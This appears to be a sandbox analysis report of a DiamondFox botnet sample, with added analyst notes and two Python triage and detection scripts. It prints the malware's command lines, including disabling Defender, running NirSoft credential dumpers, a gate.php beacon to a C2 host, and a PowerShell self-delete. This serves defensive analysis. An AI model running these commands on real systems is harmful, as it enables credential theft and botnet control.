Analysis
max time kernel: 133s
max time network: 164s
platform: windows7_x64
resource: win7v20210410
submitted: 04/07/2021, 12:03

Static task: static1
Behavioral task: behavioral1
  Sample: 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
  Resource: win10v20210408

General
Target: 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
Size: 203KB
MD5: a1e165e1926c0c83123c89fce6b1af56
SHA1: 281246ba4b852a5f62e032424f7816f5a6b0406f
SHA256: 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA512: 28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
Malware Config
Signatures
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
DiamondFox payload (18 IoCs)
Detects DiamondFox payload in file/memory.
resource                                          yara_rule
behavioral1/files/0x00040000000130e2-60.dat       diamondfox
behavioral1/files/0x00040000000130e2-61.dat       diamondfox
behavioral1/files/0x00040000000130e2-63.dat       diamondfox
behavioral1/files/0x00040000000130e2-74.dat       diamondfox
behavioral1/files/0x00040000000130e2-73.dat       diamondfox
behavioral1/files/0x00040000000130e2-136.dat      diamondfox
behavioral1/files/0x00040000000130e2-141.dat      diamondfox
behavioral1/files/0x00040000000130e2-148.dat      diamondfox
behavioral1/files/0x00040000000130e2-153.dat      diamondfox
behavioral1/files/0x00040000000130e2-158.dat      diamondfox
behavioral1/files/0x00040000000130e2-161.dat      diamondfox
behavioral1/files/0x00040000000130e2-170.dat      diamondfox
behavioral1/files/0x00040000000130e2-175.dat      diamondfox
behavioral1/files/0x00040000000130e2-180.dat      diamondfox
behavioral1/files/0x00040000000130e2-186.dat      diamondfox
behavioral1/files/0x00040000000130e2-187.dat      diamondfox
behavioral1/files/0x00040000000130e2-188.dat      diamondfox
behavioral1/files/0x00040000000130e2-189.dat      diamondfox
NirSoft MailPassView (3 IoCs)
Password recovery tool for various email clients
resource                                                                         yara_rule
behavioral1/memory/976-151-0x0000000000400000-0x0000000000455000-memory.dmp      MailPassView
behavioral1/memory/976-152-0x000000000044412E-mapping.dmp                        MailPassView
behavioral1/memory/976-155-0x0000000000400000-0x0000000000455000-memory.dmp      MailPassView
NirSoft WebBrowserPassView (3 IoCs)
Password recovery tool for various web browsers
resource                                                                         yara_rule
behavioral1/memory/836-134-0x0000000000400000-0x000000000047C000-memory.dmp      WebBrowserPassView
behavioral1/memory/836-135-0x00000000004466F4-mapping.dmp                        WebBrowserPassView
behavioral1/memory/836-138-0x0000000000400000-0x000000000047C000-memory.dmp      WebBrowserPassView
Nirsoft (8 IoCs)
resource                                                                         yara_rule
behavioral1/memory/836-134-0x0000000000400000-0x000000000047C000-memory.dmp      Nirsoft
behavioral1/memory/836-135-0x00000000004466F4-mapping.dmp                        Nirsoft
behavioral1/memory/836-138-0x0000000000400000-0x000000000047C000-memory.dmp      Nirsoft
behavioral1/memory/1596-146-0x0000000000400000-0x0000000000422000-memory.dmp     Nirsoft
behavioral1/memory/1596-150-0x0000000000400000-0x0000000000422000-memory.dmp     Nirsoft
behavioral1/memory/976-151-0x0000000000400000-0x0000000000455000-memory.dmp      Nirsoft
behavioral1/memory/976-152-0x000000000044412E-mapping.dmp                        Nirsoft
behavioral1/memory/976-155-0x0000000000400000-0x0000000000455000-memory.dmp      Nirsoft
Executes dropped EXE (10 IoCs)
pid    Process
316    MicrosoftEdgeCPS.exe
836    MicrosoftEdgeCPS.exe
2032   MicrosoftEdgeCPS.exe
1596   MicrosoftEdgeCPS.exe
976    MicrosoftEdgeCPS.exe
956    MicrosoftEdgeCPS.exe
540    MicrosoftEdgeCPS.exe
1776   MicrosoftEdgeCPS.exe
1500   MicrosoftEdgeCPS.exe
1148   MicrosoftEdgeCPS.exe
Deletes itself (1 IoC)
pid    Process
1660   powershell.exe
Loads dropped DLL (7 IoCs)
pid    Process                                                                 count
1036   2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe   2
316    MicrosoftEdgeCPS.exe                                                    1
548    WerFault.exe                                                            4
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Suspicious use of SetThreadContext (9 IoCs)
pid    target pid   Process (procid_target)
316    836          MicrosoftEdgeCPS.exe (50)
316    2032         MicrosoftEdgeCPS.exe (51)
316    1596         MicrosoftEdgeCPS.exe (52)
316    976          MicrosoftEdgeCPS.exe (53)
316    956          MicrosoftEdgeCPS.exe (54)
316    540          MicrosoftEdgeCPS.exe (57)
316    1776         MicrosoftEdgeCPS.exe (58)
316    1500         MicrosoftEdgeCPS.exe (59)
316    1148         MicrosoftEdgeCPS.exe (60)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Caveat: the second sentence is the rule's canned description. In this trace the trigger is the "wmic LogicalDisk Where DriveType=4 get VolumeName" query in the process tree (DriveType 4 is a network drive in Win32_LogicalDisk), which is host fingerprinting by the bot; nothing in the trace encrypts or renames files.
Program crash (1 IoC)
pid    pid_target   Process (procid_target)
548    1148         WerFault.exe (60)
Opens file in notepad (likely ransom note) (1 IoC)
pid    Process
1636   notepad.exe
Caveat: the argument handed to notepad.exe (and to write.exe, PID 1516) is the dropped MicrosoftEdgeCPS.exe itself, not a text file; the "ransom note" label is a rule-name artefact here.
Suspicious behavior: EnumeratesProcesses (15 IoCs)
pid    Process                count
1660   powershell.exe         2
1612   powershell.exe         2
316    MicrosoftEdgeCPS.exe   3
836    MicrosoftEdgeCPS.exe   2
1148   MicrosoftEdgeCPS.exe   1
548    WerFault.exe           5
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Token                pid    Process
SeDebugPrivilege     1660   powershell.exe
SeDebugPrivilege     1612   powershell.exe
wmic.exe (PID 288), the following set enabled twice in a row: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
wmic.exe (PID 1336): the same set once, then SeIncreaseQuotaPrivilege and SeSecurityPrivilege again before the listing stops at the 64-entry cap.
Notes: the bare numbers 33, 34 and 35 are privilege LUIDs the sandbox did not resolve to names (SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege in winnt.h). The wmic.exe rows are the WMI client enabling every privilege present in its own token at startup and appear for any wmic invocation; the actionable signal is the wmic command lines in the process tree, not the privilege adjustment. The two powershell.exe SeDebugPrivilege rows are PowerShell's own startup behaviour as well.
Suspicious use of SetWindowsHookEx (3 IoCs)
pid    Process
2032   MicrosoftEdgeCPS.exe
540    MicrosoftEdgeCPS.exe
1776   MicrosoftEdgeCPS.exe
Suspicious use of WriteProcessMemory (64 IoCs)
source pid -> target pid   Process (procid_target)                                                      writes
1036 -> 316                2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe (29)   4
1036 -> 1660               2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe (30)   4
316 -> 1612                MicrosoftEdgeCPS.exe (31)                                                    4
316 -> 288                 MicrosoftEdgeCPS.exe (35)                                                    4
316 -> 1336                MicrosoftEdgeCPS.exe (37)                                                    4
316 -> 756                 MicrosoftEdgeCPS.exe (40)                                                    4
316 -> 1348                MicrosoftEdgeCPS.exe (42)                                                    4
316 -> 332                 MicrosoftEdgeCPS.exe (44)                                                    4
316 -> 960                 MicrosoftEdgeCPS.exe (46)                                                    4
316 -> 1812                MicrosoftEdgeCPS.exe (49)                                                    4
316 -> 836                 MicrosoftEdgeCPS.exe (50)                                                    10
316 -> 2032                MicrosoftEdgeCPS.exe (51)                                                    8
316 -> 1596                MicrosoftEdgeCPS.exe (52)                                                    6 (listing cut off at the 64-entry cap)
Reading: every child, the wmic and powershell helpers included, receives the same 4 writes, so 4 is the process-creation baseline. Only the SetThreadContext targets (836, 2032, 1596 here; the rest fall past the cap) receive more, and those extra writes are the payload being placed into the freshly created copy of MicrosoftEdgeCPS.exe before its thread context is redirected.
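The SetThreadContext targets and the in-memory YARA hits above can be joined to answer the triage question "what actually ran inside each hollowed copy of MicrosoftEdgeCPS.exe?". The script below is an added example and not part of the sandbox report; its input strings are copied from the signature entries above (duplicates across the three NirSoft sections collapse into one rule set per PID), and the two regexes assume exactly that entry format.

```python
"""Join the "set thread context" targets with the in-memory YARA hits above to
label each hollowed child by the tool found inside it.
Added example; not part of the sandbox report."""
import re
from collections import defaultdict

# Entries copied from the report's "Suspicious use of SetThreadContext" section.
SET_THREAD_CONTEXT = """
PID 316 set thread context of 836 316 MicrosoftEdgeCPS.exe 50
PID 316 set thread context of 2032 316 MicrosoftEdgeCPS.exe 51
PID 316 set thread context of 1596 316 MicrosoftEdgeCPS.exe 52
PID 316 set thread context of 976 316 MicrosoftEdgeCPS.exe 53
PID 316 set thread context of 956 316 MicrosoftEdgeCPS.exe 54
PID 316 set thread context of 540 316 MicrosoftEdgeCPS.exe 57
PID 316 set thread context of 1776 316 MicrosoftEdgeCPS.exe 58
PID 316 set thread context of 1500 316 MicrosoftEdgeCPS.exe 59
PID 316 set thread context of 1148 316 MicrosoftEdgeCPS.exe 60
"""

# Memory YARA hits copied from the MailPassView, WebBrowserPassView and Nirsoft
# sections of the report.
MEMORY_YARA = """
behavioral1/memory/976-151-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView
behavioral1/memory/976-152-0x000000000044412E-mapping.dmp MailPassView
behavioral1/memory/976-155-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView
behavioral1/memory/836-134-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView
behavioral1/memory/836-135-0x00000000004466F4-mapping.dmp WebBrowserPassView
behavioral1/memory/836-138-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView
behavioral1/memory/836-134-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft
behavioral1/memory/1596-146-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft
behavioral1/memory/976-151-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft
"""

STC_RE = re.compile(r"PID (\d+) set thread context of (\d+) \d+ (\S+) (\d+)")
# pid-idx-0xSTART[-0xEND]-(memory|mapping).dmp RULE
MEM_RE = re.compile(
    r"behavioral\d+/memory/(\d+)-\d+-(0x[0-9A-Fa-f]+)(?:-(0x[0-9A-Fa-f]+))?-\w+\.dmp (\S+)")


def parse_set_thread_context(text):
    """Map each child PID to (injector PID, injector image, sandbox procid)."""
    targets = {}
    for m in STC_RE.finditer(text):
        injector, child, image, procid = m.groups()
        targets[int(child)] = (int(injector), image, int(procid))
    return targets


def parse_memory_hits(text):
    """Map PID -> {rule names} and PID -> lowest base of a dumped region."""
    rules, bases = defaultdict(set), {}
    for m in MEM_RE.finditer(text):
        pid, start, end, rule = m.groups()
        pid = int(pid)
        rules[pid].add(rule)
        if end:  # only start-end region dumps say where the PE image was mapped
            bases[pid] = min(bases.get(pid, 1 << 64), int(start, 16))
    return rules, bases


def correlate(stc_text, mem_text):
    """For every SetThreadContext target: who hollowed it, which YARA rules
    matched its memory, and the base of the dumped region (None if no dump)."""
    targets = parse_set_thread_context(stc_text)
    rules, bases = parse_memory_hits(mem_text)
    report = {}
    for child, (injector, image, procid) in targets.items():
        report[child] = {
            "injector": injector,
            "injector_image": image,
            "procid": procid,
            "rules": sorted(rules.get(child, ())),
            "image_base": bases.get(child),
        }
    return report


if __name__ == "__main__":
    for pid, info in correlate(SET_THREAD_CONTEXT, MEMORY_YARA).items():
        base = f"0x{info['image_base']:X}" if info["image_base"] else "n/a"
        print(f"PID {pid:5d} hollowed by {info['injector']} ({info['injector_image']}): "
              f"rules={info['rules'] or ['<no memory hit>']} base={base}")
```

Two things worth reading off the output: the dumped regions all start at 0x00400000, the default image base of a 32-bit PE, which is consistent with a payload executable mapped over the hollowed process rather than shellcode; and six of the nine hollowed children (2032 and all five gate.php beacon copies) have no memory rule hit at all even though they were prepared the same way, so the absence of a YARA match on a child says nothing about it being benign.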
Processes

[1036] C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
       cmdline: "C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe"
       tags: Loads dropped DLL; Suspicious use of WriteProcessMemory

    [316] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
          cmdline: "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
          tags: Executes dropped EXE; Loads dropped DLL; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory

        [1612] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
               cmdline: "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
               tags: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

        [288] C:\Windows\SysWOW64\Wbem\wmic.exe
              cmdline: "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
              tags: Suspicious use of AdjustPrivilegeToken

        [1336] C:\Windows\SysWOW64\Wbem\wmic.exe
               cmdline: "wmic" os get caption /FORMAT:List
               tags: Suspicious use of AdjustPrivilegeToken

        [756] C:\Windows\SysWOW64\Wbem\wmic.exe
              cmdline: "wmic" path win32_VideoController get caption /FORMAT:List

        [1348] C:\Windows\SysWOW64\Wbem\wmic.exe
               cmdline: "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List

        [332] C:\Windows\SysWOW64\Wbem\wmic.exe
              cmdline: "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List

        [960] C:\Windows\SysWOW64\Wbem\wmic.exe
              cmdline: "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List

        [1812] C:\Windows\SysWOW64\Wbem\wmic.exe
               cmdline: "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List

        [836] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
              cmdline: /scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
              tags: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses

        [2032] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
               cmdline: /scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
               tags: Executes dropped EXE; Suspicious use of SetWindowsHookEx

        [1596] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
               cmdline: /scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
               tags: Executes dropped EXE

        [976] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
              cmdline: /scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
              tags: Executes dropped EXE

        [956] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
              cmdline: X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
              tags: Executes dropped EXE

            [1636] C:\Windows\notepad.exe
                   cmdline: X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                   tags: Opens file in notepad (likely ransom note)

            [1516] C:\Windows\write.exe
                   cmdline: X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe

        [540] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
              cmdline: same gate.php beacon command line as PID 956
              tags: Executes dropped EXE; Suspicious use of SetWindowsHookEx

        [1776] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
               cmdline: same gate.php beacon command line as PID 956
               tags: Executes dropped EXE; Suspicious use of SetWindowsHookEx

        [1500] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
               cmdline: same gate.php beacon command line as PID 956
               tags: Executes dropped EXE

        [1148] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
               cmdline: same gate.php beacon command line as PID 956
               tags: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses

            [548] C:\Windows\SysWOW64\WerFault.exe
                  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 276
                  tags: Loads dropped DLL; Program crash; Suspicious behavior: EnumeratesProcesses

        [844] C:\Windows\SysWOW64\Wbem\wmic.exe
              cmdline: "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List

        [1832] C:\Windows\SysWOW64\Wbem\wmic.exe
               cmdline: "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List

        [1060] C:\Windows\SysWOW64\Wbem\wmic.exe
               cmdline: "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List

        [804] C:\Windows\SysWOW64\Wbem\wmic.exe
              cmdline: "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List

    [1660] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
           cmdline: "powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe' -Force -Recurse
           tags: Deletes itself; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
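The chain in the tree above is what a detection should key on: Defender real-time monitoring switched off through Set-MpPreference, the installed AV product enumerated through the SecurityCenter2 WMI namespace, NirSoft tools driven with the /scomma save switch inside copies of the dropped binary, a gate.php beacon with a spoofed User-Agent and a 32-hex bot id, and the original sample removed by a delayed PowerShell Remove-Item. The script below is an added example and not part of the sandbox report or of any vendor's ruleset. The events are constructed from the tree above in a Sysmon-like shape (pid, ppid, image, command line); the placeholder parent pid 0 for the sample, the rule names, and the beacon command-line shape (taken from the single instance in this report) are assumptions.

```python
"""Detection logic for the execution chain in the process tree above, run over
constructed Sysmon-style process-creation events.
Added example; not part of the sandbox report."""
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmd")

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe"
DROP = r"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
PWSH = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
WMIC = r"C:\Windows\SysWOW64\Wbem\wmic.exe"
BEACON = ("X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) "
          "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 "
          "Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8")

# Constructed from the process tree above. ppid 0 for the sample is a
# placeholder: the report does not show what launched it.
EVENTS = [
    Event(1036, 0, SAMPLE, f'"{SAMPLE}"'),
    Event(316, 1036, DROP, f'"{DROP}"'),
    Event(1660, 1036, PWSH,
          f"\"powershell\" Start-Sleep -s 10; Remove-Item -Path '{SAMPLE}' -Force -Recurse"),
    Event(1612, 316, PWSH, '"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1'),
    Event(288, 316, WMIC, r'"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 '
                          r'path AntiVirusProduct get DisplayName /FORMAT:List'),
    Event(1336, 316, WMIC, '"wmic" os get caption /FORMAT:List'),
    Event(836, 316, DROP, r'/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"'),
    Event(976, 316, DROP, r'/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"'),
    Event(956, 316, DROP, BEACON),
]

# NirSoft command-line tools share one family of "save report" switches.
NIRSOFT_SAVE = re.compile(r"(?:^|\s)/s(?:comma|text|tab|html|verhtml|xml)\b", re.I)
# Shape of the gate.php beacon in this report: X <url>*<user-agent>*<32-hex bot id>
BEACON_RE = re.compile(r"^X (https?://\S+?)\*(.+)\*([0-9a-f]{32})$")
DEFENDER_OFF = re.compile(r"-DisableRealtimeMonitoring\s+(?:1|\$true)\b", re.I)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_beacon(cmd):
    """Split the beacon command line into C2 URL, spoofed User-Agent and bot id."""
    m = BEACON_RE.match(cmd)
    if not m:
        return None
    return {"url": m.group(1), "user_agent": m.group(2), "bot_id": m.group(3)}


def detect(events):
    """Return (rule, pid) findings for the behaviours in the tree above."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        low = e.cmd.lower()
        if "set-mppreference" in low and DEFENDER_OFF.search(e.cmd):
            findings.append(("defender_realtime_disabled", e.pid))
        if image_name(e.image) == "wmic.exe" and "securitycenter2" in low \
                and "antivirusproduct" in low:
            findings.append(("av_product_enumeration", e.pid))
        # Self-delete: PowerShell removing the file its own parent is running from.
        if "remove-item" in low and parent and parent.image.lower() in low:
            findings.append(("self_delete_via_parent", e.pid))
        if NIRSOFT_SAVE.search(e.cmd):
            findings.append(("nirsoft_save_switch", e.pid))
        # Hollowing pattern from the tree: a process spawns its own image with a
        # different command line and (per SetThreadContext above) repurposes it.
        if parent and image_name(parent.image) == image_name(e.image) and e.cmd != parent.cmd:
            findings.append(("same_image_child_new_cmdline", e.pid))
        if parse_beacon(e.cmd):
            findings.append(("diamondfox_gate_beacon", e.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:30s} pid={pid}")
    print(parse_beacon(BEACON))
```

The same-image rule is the one that generalises beyond this sample: the NirSoft runs and the beacon copies are only visible as children of MicrosoftEdgeCPS.exe that re-execute MicrosoftEdgeCPS.exe with a foreign command line, so keying on the command-line strings alone would miss a rebuilt payload while the spawn-self-then-SetThreadContext shape stays the same.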